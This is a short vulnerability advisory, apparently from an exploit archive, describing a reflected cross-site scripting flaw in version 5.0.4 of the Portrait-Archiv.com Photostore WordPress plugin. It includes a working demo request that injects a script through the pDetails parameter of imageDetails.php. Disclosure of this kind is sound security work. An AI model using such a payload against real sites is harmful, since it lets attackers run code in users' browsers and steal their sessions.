WordPress Portrait-Archiv.com Photostore 5.0.4 Cross Site Scripting

WordPress Portrait-Archiv.com Photostore plugin version 5.0.4 suffers from a cross site scripting vulnerability.


MD5 | 757f93a2b8eac55efc4c8eba36c42744

Class Input Validation Error
Remote Yes

Credit Ricardo Sanchez
Vulnerable Portrait-Archiv.com Photostore 5.0.4

Portrait-Archiv.com is prone to a reflected cross-site scripting
vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the
browser of an unsuspecting user in the context of the affected site. This
may allow the attacker to steal cookie-based authentication credentials and
to launch other attacks.

To exploit this issue following steps:
The XSS reflected because the value url is not filter correctly:

Demo Request:
http://localhost/wordpress/wp-content/plugins/portrait-archiv-shop/js/imageDetails.php?&pDetails=);});%3C/script%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

Related Posts